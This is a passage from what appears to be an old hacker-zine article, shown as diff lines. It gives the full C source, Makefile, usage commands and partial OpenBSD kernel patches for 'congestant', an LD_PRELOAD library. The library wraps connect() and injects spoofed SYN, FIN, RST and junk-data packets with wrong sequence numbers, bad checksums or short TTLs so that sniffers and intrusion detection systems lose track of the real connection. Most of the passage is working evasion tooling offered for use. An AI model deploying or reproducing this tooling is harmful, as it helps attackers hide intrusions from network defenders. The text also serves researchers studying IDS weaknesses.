+* REALHOST -> TARGET DATA x 8 (1024 bytes, Bad TCP Checksum, Real Seq Number Z)
+Attack 8 - FIN/RST Spoofing - Checksum
+* REALHOST -> TARGET FIN (Bad TCP Checksum, Seq Number Z+8192)
+* REALHOST -> TARGET FIN (Bad TCP Checksum, Seq Number Z+1+8192)
+* REALHOST -> TARGET RST (Bad TCP Checksum, Seq Number Z+2+8192)
+* REALHOST -> TARGET RST (Bad TCP Checksum, Seq Number Z+3+8192)
+
+The attacks with an asterisk require kernel support to determine the correct
+sequence numbers.  Arguably, this could be done without kernel support,
+utilizing a datalink level sniffer, but it would make the code significantly
+more complex, because it would have to reassemble fragments, and do several
+validation checks in order to follow the real connection.  The user can choose 
+which of these attacks he/she would like to perform, and the sequence numbers
+will adjust themselves accordingly.
+
+
+----[  Section 2 - Implementation and Usage
+
+My primary goal when implementing these techniques was to keep the changes
+necessary to normal system usage as slight as possible.  I had to divide the
+techniques into two categories: attacks that can be performed from user
+context, and attacks that have to be augmented by the kernel in some fashion.
+My secondary goal was to make the userland set of attacks reasonably portable
+to other Unix environments, besides OpenBSD and Linux. 
+
+The userland attacks are implemented using shared library redirection, an
+extremely useful technique borrowed from halflife's P51-08 article.  The first
+program listed below, congestant.c, is a shared library that the user requests
+the loader to link first.  This is done with the LD_PRELOAD environment
+variable on several unixes.  For more information about this technique, refer
+to the original article by halflife. 
+
+The shared library defines the connect symbol, thus pre-empting the normal
+connect function from libc (or libsocket) during the loading phase of program
+execution.  Thus, you should be able to use these techniques with most any
+client program that utilizes normal BSD socket functionality.  OpenBSD does
+not let us do shared library redirection (when you attempt to dlsym the old
+symbol out of libc, it gives you a pointer to the function you had pre-loaded).
+However, this is not a problem because we can just call the connect() syscall
+directly.
+
+This shared library has some definite drawbacks, but you get what you pay for.
+It will not work correctly with programs that do non-blocking connect calls,
+or RAW or datalink level access.  Furthermore, it is designed for use on TCP
+sockets, and without kernel support to determine the type of a socket, it will
+attempt the TCP attacks on UDP connections.  This support is currently only
+implemented under OpenBSD.  However, this isn't that big of a drawback because
+it just sends a few packets that get ignored.  Another drawback to the shared
+library is that it picks a sequence number out of the blue to represent the
+"wrong" sequence number.  Due to this fact, there is a very small possibility
+that the shared library will pick a legitimate sequence number, and not
+desynchronize the stream.  This, however, is extremely unlikely.
+
+A Makefile accompanies the shared library.  Edit it to fit your host, and then
+go into the source file and make it point to your copy of libc.so, and you
+should be ready to go.  The code has been tested on OpenBSD 2.3, 2.4, Debian
+Linux, Slackware Linux, Debian glibc Linux, Solaris 2.5, and Solaris 2.6.
+You can use the library like this:
+
+# export LD_PRELOAD=./congestion.so
+# export CONGCONF="DEBUG,OH,SC,SS,DS,FS,RS"
+# telnet www.blah.com
+
+The library will "wrap" around any connects in the programs you run from that
+point on, and provide you some protection behind the scenes.  You can control
+the program by defining the CONGCONF environment variable.  You give it a
+comma delimited list of attacks, which break out like this:
+
+DEBUG: Show debugging information
+OH: Do the One Host Design Attack
+SC: Spoof a SYN prior to the connect with a bad TCP checksum.
+SS: Spoof a SYN after the connection in a desynchronization attempt.
+DS: Insert 8k of data with bad sequence numbers.
+FS: Spoof FIN packets with bad sequence numbers.
+RS: Spoof RST packets with bad sequence numbers.
+DC: Insert 8k of data with bad TCP checksums. (needs kernel support)
+FC: Spoof FIN packets with bad TCP checksums. (needs kernel support)
+RC: Spoof RST packets with bad TCP checksums. (needs kernel support)
+DT: Insert 8k of data with short TTLs. (needs kernel support)
+FT: Spoof FIN packets with short TTLs. (needs kernel support)
+RT: Spoof RST packets with short TTLs. (needs kernel support)
+
+Kernel Support
+--------------
+
+OpenBSD kernel patches are provided to facilitate several of the techniques
+described above.  These patches have been made against the 2.4 source
+distribution. I have added three sysctl variables to the kernel, and one new
+system call.  The three sysctl variables are:
+
+net.inet.ip.fraghackhead (integer)
+net.inet.ip.fraghackbody (integer)
+net.inet.ip.optionshack  (integer)
+
+The new system call is getsockinfo(), and it is system call number 242.
+
+The three sysctl's can be used to modify the characteristics of every outgoing
+IP packet coming from the machine.  The fraghackhead variable specifies a new
+mtu, in bytes, for outgoing IP datagrams.  fraghackhead is applied to every
+outgoing datagram, unless fraghackbody is also defined.  In that case, the mtu
+for the first fragment of a packet is read from fraghackhead, and the mtu for
+every consecutive fragment is read from fraghackbody.  This allows you to
+force your machine into fragmenting all of its traffic, to any size that you
+specify.  The reason it is divided into two variables is so that you can have
+the first fragment contain the entire TCP/UDP header, and have the following
+fragments be 8 or 16 bytes.  This way, you can get your fragmented packets past
+certain filtering routers that block any sort of potential header rewriting.
+The optionshack sysctl allows you to turn on mandatory 40 bytes of NULL IP
+options on every outgoing packet. 
+
+I implemented these controls such that they do not have any effect on packets
+sent through raw sockets.  The implication of this is that our attacking
+packets will not be fragmented or contain IP options.
+
+Using these sysctl's is pretty simple: for the fraghack variables, you specify
+a number of bytes (or 0 to turn them off), and for the optionshack, you either
+set it to 0 or 1. Here is an example use:
+
+# sysctl -w net.inet.ip.optionshack=1    # 40 bytes added to header
+# sysctl -w net.inet.ip.fraghackhead=80  # 20 + 40 + 20 = full protocol header 
+# sysctl -w net.inet.ip.fraghackbody=68  # 20 + 40 + 8 = smallest possible frag
+
+It is very important to note that you should be careful with the fraghack
+options.  When you specify extreme fragmentation, you quickly eat up the
+memory that the kernel has available for storing packet headers.  If memory
+usage is too high, you will notice sendto() returning a no buffer space error.
+If you stick to programs like telnet or ssh, that use small packets, then you 
+should be fine with 28 or 28/36. However, if you use programs that use large 
+packets like ftp or rcp, then you should bump fraghackbody up to a higher 
+number, such as 200.
+
+The system call, getsockinfo, is needed by the userland program to determine if
+a socket is a TCP socket, and to query the kernel for the next sequence number
+that it expects to send on the next outgoing packet, as well as the next
+sequence number it expects to receive from it's peer.  This allows the
+userland program to implement attacks based on having a correct sequence
+number, but some other flaw in the packet such as a short TTL or bad TCP
+checksum.
+
+
+Kernel Patch Installation
+-------------------------
+
+Here are the steps I use to install the kernel patches.
+
+Disclaimer: I am not an experienced kernel programmer, so don't be too upset
+if your box gets a little flaky.  The testing I've done on my own machines has
+gone well, but be aware that you really are screwing with critical stuff by
+installing these patches. You may suffer performance hits, or other such
+unpleasentries.  But hey, you can't have any fun if you don't take any risks. :>
+
+Step 1. Apply the netinet.patch to /usr/src/sys/netinet/
+Step 2. cp /usr/src/sys/netinet/in.h to /usr/include/netinet/in.h
+Step 3. go into /usr/src/usr.sbin/sysctl, and rebuild and install it
+Step 4. Apply kern.patch to /usr/src/sys/kern/
+Step 5. cd /usr/src/sys/kern; make
+Step 6. Apply sys.patch to /usr/src/sys/sys/
+Step 7. cd into your kernel build directory
+	(/usr/src/sys/arch/XXX/compile/XXX), and do a make depend && make. 
+Step 8. cp bsd /bsd, reboot, and cross your fingers. :>
+
+
+----[  The Code
+<++> congestant/Makefile
+# OpenBSD
+LDPRE=-Bshareable
+LDPOST=
+OPTS=-DKERNELSUPPORT
+
+# Linux
+#LDPRE=-Bshareable
+#LDPOST=-ldl
+#OPTS=
+
+# Solaris
+#LDPRE=-G
+#LDPOST=-ldl
+#OPTS=-DBIG_ENDIAN=42 -DBYTEORDER=42 
+
+congestant.so: congestant.o
+	ld ${LDPRE} -o congestant.so congestant.o ${LDPOST}
+
+congestant.o: congestant.c
+	gcc ${OPTS} -fPIC -c congestant.c
+
+clean: 
+	rm -f congestant.o congestant.so
+<-->
+<++> congestant/congestant.c
+/* 
+ * congestant.c - demonstration of sniffer/ID defeating techniques 
+ *
+ * by horizon <jmcdonal@unf.edu>
+ * special thanks to stran9er, mea culpa, plaguez, halflife, and fyodor
+ *
+ * openbsd doesn't let us do shared lib redirection, so we implement the
+ * connect system call directly. Also, the kernel support for certain attacks
+ * is only implemented in openbsd. When I finish the linux support, it will
+ * be available at http://www.rhino9.ml.org
+ *
+ * This whole thing is a conditionally compiling nightmare. :>
+ * This has been tested under OpenBSD 2.3, 2.4, Solaris 2.5, Solaris 2.5.1,
+ * Solaris 2.6, Debian Linux, and the glibc Debian Linux 
+ */
+
+/* The path to our libc. (libsocket under Solaris) */
+/* You don't need this if you are running OpenBSD */
+/* #define LIB_PATH "/usr/lib/libsocket.so" */
+#define LIB_PATH "/lib/libc-2.0.7.so"
+/* #define LIB_PATH "/usr/lib/libc.so"  */
+
+/* The source of our initial spoofed SYN in the One Host Design attack */
+/* This has to be some host that will survive any outbound packet filters */
+#define FAKEHOST "42.42.42.42"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <fcntl.h>
+#include <dlfcn.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#if __linux__
+#include <endian.h>
+#endif
+#include <errno.h>
+
+struct cong_config
+{
+	int one_host_attack;
+	int fin_seq;
+	int rst_seq;
+	int syn_seq;
+	int data_seq;	
+	int data_chk;	
+	int fin_chk;
+	int rst_chk;
+	int syn_chk;
+	int data_ttl;	
+	int fin_ttl;
+	int rst_ttl;
+	int ttl;
+} cong_config;
+
+int cong_init=0;
+int cong_debug=0;
+long cong_ttl_cache=0;
+int cong_ttl=0;
+
+/* If this is not openbsd, then we will use the connect symbol from libc */
+/* otherwise, we will use syscall(SYS_connect, ...) */
+
+#ifndef __OpenBSD__
+
+#if __GLIBC__ == 2
+int (*cong_connect)(int, __CONST_SOCKADDR_ARG, socklen_t)=NULL;
+#else 
+int (*cong_connect)(int, const struct sockaddr *, int)=NULL;
+#endif 
+
+#endif /* not openbsd */
+
+#define DEBUG(x) if (cong_debug==1) fprintf(stderr,(x));
+
+/* define our own headers so its easier to port. use cong_ to avoid any 
+ * potential symbol name collisions */
+
+struct cong_ip_header
+{
+	unsigned char  ip_hl:4,         /* header length */
+		ip_v:4;               /* version */
+	unsigned char  ip_tos;          /* type of service */
+	unsigned short ip_len;          /* total length */
+	unsigned short ip_id;           /* identification */
+	unsigned short ip_off;          /* fragment offset field */
+#define IP_RF 0x8000                    /* reserved fragment flag */
+#define IP_DF 0x4000                    /* dont fragment flag */
+#define IP_MF 0x2000                    /* more fragments flag */
+#define IP_OFFMASK 0x1fff               /* mask for fragmenting bits */
+	unsigned char  ip_ttl;          /* time to live */
+	unsigned char  ip_p;                    /* protocol */
+	unsigned short ip_sum;          /* checksum */
+	unsigned long ip_src, ip_dst; /* source and dest address */
+};
+
+struct cong_icmp_header /* this is really an echo */
+{
+   unsigned char icmp_type;
+   unsigned char icmp_code;
+   unsigned short icmp_checksum;
+   unsigned short icmp_id;
+   unsigned short icmp_seq;
+   unsigned long icmp_timestamp;
+};
+
+struct cong_tcp_header 
+{
+   unsigned short  th_sport;      /* source port */
+   unsigned short  th_dport;      /* destination port */
+   unsigned int  th_seq;        /* sequence number */
+   unsigned int  th_ack;        /* acknowledgement number */
+#if BYTE_ORDER == LITTLE_ENDIAN
+   unsigned char   th_x2:4,    /* (unused) */
+      th_off:4;      /* data offset */
+#endif
+#if BYTE_ORDER == BIG_ENDIAN
+   unsigned char   th_off:4,      /* data offset */
+      th_x2:4;    /* (unused) */
+#endif
+   unsigned char   th_flags;
+#define  TH_FIN   0x01
+#define  TH_SYN   0x02
+#define  TH_RST   0x04
+#define  TH_PUSH  0x08
+#define  TH_ACK   0x10
+#define  TH_URG   0x20
+   unsigned short  th_win;        /* window */
+   unsigned short  th_sum;        /* checksum */
+   unsigned short  th_urp;        /* urgent pointer */
+};
+
+struct cong_pseudo_header
+{  
+	unsigned long saddr, daddr;
+	char mbz;
+	char ptcl;
+	unsigned short tcpl;
+};
+
+int cong_checksum(unsigned short* data, int length)
+{
+	register int nleft=length;
+	register unsigned short *w = data;
+	register int sum=0;
+	unsigned short answer=0;
+
+	while (nleft>1)
+	{
+		sum+=*w++;
+		nleft-=2;
+	}
+
+	if (nleft==1)
+	{
+		*(unsigned char *)(&answer) = *(unsigned char *)w;
+		sum+=answer;
+	}
+
+	sum=(sum>>16) + (sum & 0xffff);
+	sum +=(sum>>16);
+	answer=~sum;
+
+        return answer;
+}
+
+#define PHLEN (sizeof (struct cong_pseudo_header))
+#define IHLEN (sizeof (struct cong_ip_header))
+#define ICMPLEN (sizeof (struct cong_icmp_header))
+#define THLEN (sizeof (struct cong_tcp_header))
+
+/* Utility routine for the ttl attack. Sends an icmp echo */
+
+void cong_send_icmp(long source, long dest, int seq, int id, int ttl)
+{
+	struct sockaddr_in sa;
+	int sock,packet_len;
+	char *pkt;
+	struct cong_ip_header *ip;
+	struct cong_icmp_header *icmp;
+
+	int on=1;
+
+	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
+	{
+		perror("socket");
+		exit(1);
+	}
+
+	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) 
+	{
+		perror("setsockopt: IP_HDRINCL");
+		exit(1);
+	}
+
+	bzero(&sa,sizeof(struct sockaddr_in));
+        sa.sin_addr.s_addr = dest;
+        sa.sin_family = AF_INET;
+
+	pkt=calloc((size_t)1,(size_t)(IHLEN+ICMPLEN));
+
+	ip=(struct cong_ip_header *)pkt;
+	icmp=(struct cong_icmp_header *)(pkt+IHLEN);
+	
+	ip->ip_v = 4;
+	ip->ip_hl = IHLEN >>2;
+	ip->ip_tos = 0;
+	ip->ip_len = htons(IHLEN+ICMPLEN);
+	ip->ip_id = htons(getpid() & 0xFFFF);
+	ip->ip_off = 0;
+	ip->ip_ttl = ttl;
+	ip->ip_p = IPPROTO_ICMP ;//ICMP
+	ip->ip_sum = 0;
+	ip->ip_src = source;
+	ip->ip_dst = dest;
+	icmp->icmp_type=8;
+	icmp->icmp_seq=htons(seq);
+	icmp->icmp_id=htons(id);
+	icmp->icmp_checksum=cong_checksum((unsigned short*)icmp,ICMPLEN);
+
+	if(sendto(sock,pkt,IHLEN+ICMPLEN,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
+	{
+		perror("sendto");
+	}
+
+	free(pkt);
+	close(sock);
+}
+
+/* Our main worker routine. sends a TCP packet */
+
+void cong_send_tcp(long source, long dest,short int sport, short int dport,
+ 		long seq, long ack, int flags, char *data, int dlen, 
+			int cksum, int ttl)
+{
+	struct sockaddr_in sa;
+	int sock,packet_len;
+	char *pkt,*phtcp;
+	struct cong_pseudo_header *ph;
+	struct cong_ip_header *ip;
+	struct cong_tcp_header *tcp;
+
+	int on=1;
+
+	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
+	{
+		perror("socket");
+		exit(1);
+	}
+
+	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) 
+	{
+		perror("setsockopt: IP_HDRINCL");
+		exit(1);
+	}
+
+	bzero(&sa,sizeof(struct sockaddr_in));
+        sa.sin_addr.s_addr = dest;
+        sa.sin_family = AF_INET;
+	sa.sin_port = dport;
+
+	phtcp=calloc((size_t)1,(size_t)(PHLEN+THLEN+dlen));
+	pkt=calloc((size_t)1,(size_t)(IHLEN+THLEN+dlen));
+
+	ph=(struct cong_pseudo_header *)phtcp;
+	tcp=(struct cong_tcp_header *)(((char *)phtcp)+PHLEN);
+	ip=(struct cong_ip_header *)pkt;
+	
+	ph->saddr=source;
+	ph->daddr=dest;
+	ph->mbz=0;
+	ph->ptcl=IPPROTO_TCP;
+	ph->tcpl=htons(THLEN + dlen);
+
+	tcp->th_sport=sport;
+	tcp->th_dport=dport;
+	tcp->th_seq=seq;
+	tcp->th_ack=ack;
+	tcp->th_off=THLEN/4;
+	tcp->th_flags=flags;
+	if (ack) tcp->th_flags|=TH_ACK;
+	tcp->th_win=htons(16384);
+	memcpy(&(phtcp[PHLEN+THLEN]),data,dlen);
+	tcp->th_sum=cong_checksum((unsigned short*)phtcp,PHLEN+THLEN+dlen)+cksum;
+                            
+	ip->ip_v = 4;
+	ip->ip_hl = IHLEN >>2;
+	ip->ip_tos = 0;
+	ip->ip_len = htons(IHLEN+THLEN+dlen);
+	ip->ip_id = htons(getpid() & 0xFFFF);
+	ip->ip_off = 0;
+	ip->ip_ttl = ttl;
+	ip->ip_p = IPPROTO_TCP ;//TCP
+	ip->ip_sum = 0;
+	ip->ip_src = source;
+	ip->ip_dst = dest;
+	ip->ip_sum = cong_checksum((unsigned short*)ip,IHLEN);
+
+	memcpy(((char *)(pkt))+IHLEN,(char *)tcp,THLEN+dlen);
+
+	if(sendto(sock,pkt,IHLEN+THLEN+dlen,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
+	{
+		perror("sendto");
+	}
+
+	free(phtcp);
+	free(pkt);
+	close(sock);
+}
+
+/* Utility routine for data insertion attacks */
+
+void cong_send_data(long source, long dest,short int sport, short int dport,
+			long seq, long ack, int chk, int ttl)
+{
+	char data[1024];
+	int i,j;
+
+	for (i=0;i<8;i++)
+	{
+		for (j=0;j<1024;data[j++]=random());
+
+		cong_send_tcp(source, dest, sport, dport, htonl(seq+i*1024), 
+			htonl(ack), TH_PUSH, data, 1024, chk, ttl);
+	}
+}
+
+/* Utility routine for the ttl attack  - potentially unreliable */
+/* This could be rewritten to look for the icmp ttl exceeded and count
+ * the number of packets it receives, thus going much quicker. */
+
+int cong_find_ttl(long source, long dest)
+{
+	int sock;
+	long timestamp;	
+	struct timeval tv,tvwait;
+	int ttl=0,result=255;
+	char buffer[8192];
+	int bread;
+	fd_set fds;
+	struct cong_ip_header *ip;
+	struct cong_icmp_header *icmp;
+
+	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0)
+	{
+		perror("socket");
+		exit(1);
+	}
+	tvwait.tv_sec=0;
+	tvwait.tv_usec=500;
+
+	gettimeofday(&tv,NULL);
+	timestamp=tv.tv_sec+3; // 3 second timeout
+	
+	DEBUG("Determining ttl...");
+
+	while(tv.tv_sec<=timestamp)
+	{
+		gettimeofday(&tv,NULL);
+		if (ttl<50)
+		{
+			cong_send_icmp(source,dest,ttl,1,ttl);
+			cong_send_icmp(source,dest,ttl,1,ttl);
+			cong_send_icmp(source,dest,ttl,1,ttl++);
+		}	
+		FD_ZERO(&fds);
+		FD_SET(sock,&fds);
+		select(sock+1,&fds,NULL,NULL,&tvwait);
+		if (FD_ISSET(sock,&fds))
+		{
+			if (bread=read(sock,buffer,sizeof(buffer)))
+			{
+				/* should we practice what we preach? 
+					nah...  too much effort :p */
+
+				ip=(struct cong_ip_header *)buffer;
+				if (ip->ip_src!=dest)
+					continue;
+				icmp=(struct cong_icmp_header *)(buffer +
+					 ((ip->ip_hl)<<2));
+				if (icmp->icmp_type!=0)
+					continue;
+				if (ntohs(icmp->icmp_seq)<result)
+					result=ntohs(icmp->icmp_seq);
+			}
+		}
+	}
+	if (cong_debug)
+		fprintf(stderr,"%d\n",result);
+
+	close(sock);
+	return result;
+}
+
+/* This is our init routine - reads conf env var*/
+
+/* On the glibc box I tested, you cant dlopen from within
+ * _init, so there is a little hack here */
+
+#if __GLIBC__ == 2
+int cong_start(void)
+#else
+int _init(void)
+#endif
+{
+	void *handle;
+	char *conf;
+
+#ifndef __OpenBSD__
+	handle=dlopen(LIB_PATH,1);
+	if (!handle)
+	{
+		fprintf(stderr,"Congestant Error: Can't load libc.\n");
+		return 0;
+	}
+
+#if __linux__ || (__svr4__ && __sun__) || sgi || __osf__
+	cong_connect = dlsym(handle, "connect");
+#else
+	cong_connect = dlsym(handle, "_connect");
+#endif
+
+	if (!cong_connect)
+	{
+		fprintf(stderr,"Congestant Error: Can't find connect().\n");
+		return -1;
+	}
+#endif	/* not openbsd */
+
+	memset(&cong_config,0,sizeof(struct cong_config));
+
+	if (conf=getenv("CONGCONF"))
+	{
+		char *token;
+		token=strtok(conf,",");
+		while (token)
+		{
+			if (!strcmp(token,"OH"))
+				cong_config.one_host_attack=1;
+			else if (!strcmp(token,"FS"))
+				cong_config.fin_seq=1;
+			else if (!strcmp(token,"RS"))
+				cong_config.rst_seq=1;
+			else if (!strcmp(token,"SS"))
+				cong_config.syn_seq=1;
+			else if (!strcmp(token,"DS"))
+				cong_config.data_seq=1;
+			else if (!strcmp(token,"FC"))
+				cong_config.fin_chk=1;
+			else if (!strcmp(token,"RC"))
+				cong_config.rst_chk=1;
+			else if (!strcmp(token,"SC"))
+				cong_config.syn_chk=1;
+			else if (!strcmp(token,"DC"))
+				cong_config.data_chk=1;
+			else if (!strcmp(token,"FT"))
+			{
+				cong_config.fin_ttl=1;
+				cong_config.ttl=1;
+			}
+			else if (!strcmp(token,"RT"))
+			{
+				cong_config.rst_ttl=1;
+				cong_config.ttl=1;
+			}
+			else if (!strcmp(token,"DT"))
+			{
+				cong_config.data_ttl=1;
+				cong_config.ttl=1;
+			}
+			else if (!strcmp(token,"DEBUG"))
+				cong_debug=1;
+
+			token=strtok(NULL,",");	
+		}
+	}
+	else		/* default to full sneakiness */
+	{
+		cong_config.one_host_attack=1;
+		cong_config.fin_seq=1;
+		cong_config.rst_seq=1;
+		cong_config.syn_seq=1;
+		cong_config.data_seq=1;
+		cong_config.syn_chk=1;
+		cong_debug=1;
+			/* assume they have kernel support */
+			/* attacks are only compiled in under obsd*/
+		cong_config.data_chk=1;
+		cong_config.fin_chk=1;
+		cong_config.rst_chk=1;
+		cong_config.data_ttl=1;
+		cong_config.fin_ttl=1;
+		cong_config.rst_ttl=1;
+		cong_config.ttl=1;
+	}
+
+	cong_init=1;
+}
+
+/* This is our definition of connect */
+
+#if (__svr4__ && __sun__)
+int connect (int __fd, struct sockaddr * __addr, int __len)
+#else
+#if __GLIBC__ == 2
+int connect __P ((int __fd,
+                         __CONST_SOCKADDR_ARG __addr, socklen_t __len))
+#else
+int connect __P ((int __fd, const struct sockaddr * __addr, int __len))
+#endif
+#endif
+{
+	int result,nl;
+	struct sockaddr_in sa;
+
+	long from,to;
+	short src,dest;
+
+	unsigned long fakeseq=424242;
+	int type=SOCK_STREAM;
+	unsigned long realseq=0;
+	unsigned long recvseq=0;
+	int ttl=255,ttlseq;
+
+#if __GLIBC__ == 2
+	if (cong_init==0)
+		cong_start();
+#endif
+
+	if (cong_init++==1)
+		fprintf(stderr,"Congestant v1 by horizon loaded.\n");
+
+/* quick hack so we dont waste time with udp connects */
+
+#ifdef KERNELSUPPORT
+#ifdef __OpenBSD__
+	syscall(242,__fd,&type,&realseq,&recvseq);
+#endif /* openbsd */
+	if (type!=SOCK_STREAM)	
+	{
+		result=syscall(SYS_connect,__fd,__addr,__len);
+		return result;
+	}
+#endif /* kernel support */
+	
+	nl=sizeof(sa);
+	getsockname(__fd,(struct sockaddr *)&sa,&nl);
+	from=sa.sin_addr.s_addr;
+	src=sa.sin_port;
+
+#if __GLIBC__ == 2
+	to=__addr.__sockaddr_in__->sin_addr.s_addr;
+	dest=__addr.__sockaddr_in__->sin_port;
+#else
+	to=((struct sockaddr_in *)__addr)->sin_addr.s_addr;
+	dest=((struct sockaddr_in *)__addr)->sin_port;
+#endif
+
+	if (cong_config.one_host_attack)
+	{
+		cong_send_tcp(inet_addr(FAKEHOST), 
+			to, 4242, dest, 0, 0,
+			TH_SYN, NULL, 0, 0, 254);
+		DEBUG("Spoofed Fake SYN Packet\n");
+	}
+
+	if (cong_config.syn_chk)
+	{
+		/* This is a potential problem that could mess up
+		 * client programs. If necessary, we bind the socket 
+		 * so that we can know what the source port will be
+		 * prior to the connection.
+		 */
+		if (src==0)
+		{
+			bind(__fd,(struct sockaddr *)&sa,nl);
+			getsockname(__fd,(struct sockaddr *)&sa,&nl);
+			from=sa.sin_addr.s_addr;
+			src=sa.sin_port;
+		}
+
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq), 0,
+			TH_SYN, NULL, 0,100, 254);
+		DEBUG("Sent Pre-Connect Desynchronizing SYN.\n");
+		fakeseq++;
+	}
+
+	DEBUG("Connection commencing...\n");
+
+#ifndef __OpenBSD__
+	result=cong_connect(__fd,__addr,__len);
+#else /* not openbsd */
+	result=syscall(SYS_connect,__fd,__addr,__len);
+#endif
+
+	if (result==-1)
+	{
+		if (errno!=EINPROGRESS)
+			return -1;
+		/* Let's only print the warning once */
+		if (cong_init++==2)
+			fprintf(stderr,"Warning: Non-blocking connects might not work right.\n");
+	}
+
+	/* In case an ephemeral port was assigned by connect */
+
+	nl=sizeof(sa);
+	getsockname(__fd,(struct sockaddr *)&sa,&nl);
+	from=sa.sin_addr.s_addr;
+	src=sa.sin_port;
+
+	if (cong_config.syn_seq)
+	{
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0,
+			TH_SYN, NULL, 0, 0, 254);
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0,
+			TH_SYN, NULL, 0, 0, 254);
+
+		DEBUG("Sent Desynchronizing SYNs.\n");
+	}
+
+	if (cong_config.data_seq)
+	{
+		cong_send_data(from,to,src,dest,(fakeseq),0,0,254);
+		DEBUG("Inserted 8K of data with incorrect sequence numbers.\n");
+		fakeseq+=8*1024;
+	}
+
+	if (cong_config.fin_seq)
+	{
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0,
+			TH_FIN, NULL, 0, 0, 254);
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq++),  0,
+			TH_FIN, NULL, 0, 0, 254);
+
+		DEBUG("Spoofed FINs with incorrect sequence numbers.\n");
+	}
+
+	if (cong_config.rst_seq)
+	{	
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0,
+			TH_RST, NULL, 0, 0, 254);
+		cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0,
+			TH_RST, NULL, 0, 0, 254);
+
+		DEBUG("Spoofed RSTs with incorrect sequence numbers.\n");
+	}
+
+#ifdef KERNELSUPPORT
+#ifdef __OpenBSD__
+
+	if (cong_config.ttl==1) 
+		if (cong_ttl_cache!=to)
+		{
+			ttl=cong_find_ttl(from,to)-1;
+			cong_ttl_cache=to;
+			cong_ttl=ttl;
+		}
+		else
+			ttl=cong_ttl;
+	if (ttl<0) 
+	{
+		fprintf(stderr,"Warning: The target host is too close for a ttl attack.\n");
+		cong_config.data_ttl=0;	
+		cong_config.fin_ttl=0;	
+		cong_config.rst_ttl=0;	
+		ttl=0;
+	}
+
+	syscall(242,__fd,&type,&realseq,&recvseq);
+	ttlseq=realseq;
+
+#endif /*openbsd */
+
+	if (cong_config.data_ttl)
+	{
+		cong_send_data(from,to,src,dest,(ttlseq),recvseq,0,ttl);
+		DEBUG("Inserted 8K of data with short ttl.\n");
+		ttlseq+=1024*8;
+	}
+
+	if (cong_config.fin_ttl)
+	{
+		cong_send_tcp(from, to, src, dest, htonl(ttlseq++), 
+			htonl(recvseq),TH_FIN, NULL, 0, 0, ttl); 
+		cong_send_tcp(from, to, src, dest, htonl(ttlseq++), 
+			htonl(recvseq),TH_FIN, NULL, 0, 0, ttl); 
+		DEBUG("Spoofed FINs with short ttl.\n");
+	}
+
+	if (cong_config.rst_ttl)
+	{
+		cong_send_tcp(from, to, src, dest, htonl(ttlseq++),
+			htonl(recvseq),TH_RST, NULL, 0, 0, ttl);
+		cong_send_tcp(from, to, src, dest, htonl(ttlseq++),
+			htonl(recvseq),TH_RST, NULL, 0, 0, ttl);
+		DEBUG("Spoofed RSTs with short ttl.\n");
+	}
+
+	if (cong_config.data_chk)
+	{
+		cong_send_data(from,to,src,dest,(realseq),recvseq,100,254);
+		DEBUG("Inserted 8K of data with incorrect TCP checksums.\n");
+		realseq+=1024*8;
+	}
+
+	if (cong_config.fin_chk)
+	{
+		cong_send_tcp(from, to, src, dest, htonl(realseq++), 
+			htonl(recvseq),TH_FIN, NULL, 0, 100, 254); 
+		cong_send_tcp(from, to, src, dest, htonl(realseq++), 
+			htonl(recvseq),TH_FIN, NULL, 0, 100, 254); 
+		DEBUG("Spoofed FINs with incorrect TCP checksums.\n");
+	}
+
+	if (cong_config.rst_chk)
+	{
+		cong_send_tcp(from, to, src, dest, htonl(realseq++),
+			htonl(recvseq),TH_RST, NULL, 0, 100, 254);
+		cong_send_tcp(from, to, src, dest, htonl(realseq++),
+			htonl(recvseq),TH_RST, NULL, 0, 100, 254);
+		DEBUG("Spoofed RSTs with incorrect TCP checksums.\n");
+	}
+
+#endif /* kernel support */
+
+	return result;
+}
+<-->
+<++> congestant/netinet.patch
+Common subdirectories: /usr/src/sys.2.4.orig/netinet/CVS and netinet/CVS
+diff -u /usr/src/sys.2.4.orig/netinet/in.h netinet/in.h
+--- /usr/src/sys.2.4.orig/netinet/in.h	Tue Dec  8 10:32:38 1998
++++ netinet/in.h	Tue Dec  8 10:48:33 1998
+@@ -325,7 +325,10 @@
+ #define IPCTL_IPPORT_LASTAUTO	8
+ #define IPCTL_IPPORT_HIFIRSTAUTO 9
+ #define IPCTL_IPPORT_HILASTAUTO	10
+-#define	IPCTL_MAXID		11
++#define IPCTL_FRAG_HACK_HEAD	11
++#define IPCTL_FRAG_HACK_BODY	12
++#define IPCTL_OPTIONS_HACK	13
++#define	IPCTL_MAXID		14
+ 
+ #define	IPCTL_NAMES { \
+ 	{ 0, 0 }, \
+@@ -339,6 +342,9 @@
+ 	{ "portlast", CTLTYPE_INT }, \
+ 	{ "porthifirst", CTLTYPE_INT }, \
+ 	{ "porthilast", CTLTYPE_INT }, \
++	{ "fraghackhead", CTLTYPE_INT }, \
++	{ "fraghackbody", CTLTYPE_INT }, \
++	{ "optionshack", CTLTYPE_INT }, \
+ }
+ 
+ #ifndef _KERNEL
+diff -u /usr/src/sys.2.4.orig/netinet/ip_input.c netinet/ip_input.c
+--- /usr/src/sys.2.4.orig/netinet/ip_input.c	Tue Dec  8 10:32:41 1998
++++ netinet/ip_input.c	Tue Dec  8 10:48:33 1998
+@@ -106,6 +106,10 @@
+ extern int ipport_hilastauto;
